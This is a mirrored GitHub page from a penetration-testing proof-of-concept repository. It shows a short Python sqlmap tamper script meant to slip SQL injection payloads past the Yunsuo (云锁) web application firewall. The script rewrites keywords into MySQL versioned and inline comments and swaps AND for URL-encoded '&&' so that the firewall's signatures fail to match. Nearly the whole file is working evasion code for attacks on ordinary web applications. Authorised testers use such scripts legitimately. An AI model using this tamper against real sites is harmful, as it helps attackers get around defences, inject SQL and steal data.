mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 09:50:19 +00:00
28 lines
747 B
Python
28 lines
747 B
Python
![]() |
# coding=UTF-8
|
||
|
# Desc: sqlmap bypass 云锁 tamper
|
||
|
"""
|
||
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||
|
See the file 'LICENSE' for copying permission
|
||
|
"""
|
||
|
|
||
|
import re
|
||
|
|
||
|
from lib.core.data import kb
|
||
|
from lib.core.enums import PRIORITY
|
||
|
from lib.core.common import singleTimeWarnMessage
|
||
|
from lib.core.enums import DBMS
|
||
|
__priority__ = PRIORITY.LOW
|
||
|
|
||
|
|
||
|
def dependencies():
|
||
|
pass
|
||
|
|
||
|
|
||
|
def tamper(payload, **kwargs):
|
||
|
payload = payload.replace('ORDER', '/*!00000order*/')
|
||
|
payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
|
||
|
payload = payload.replace('CONCAT(', "CONCAT/**/(")
|
||
|
payload = payload.replace("--", " */--")
|
||
|
payload = payload.replace("AND", "%26%26")
|
||
|
return payload
|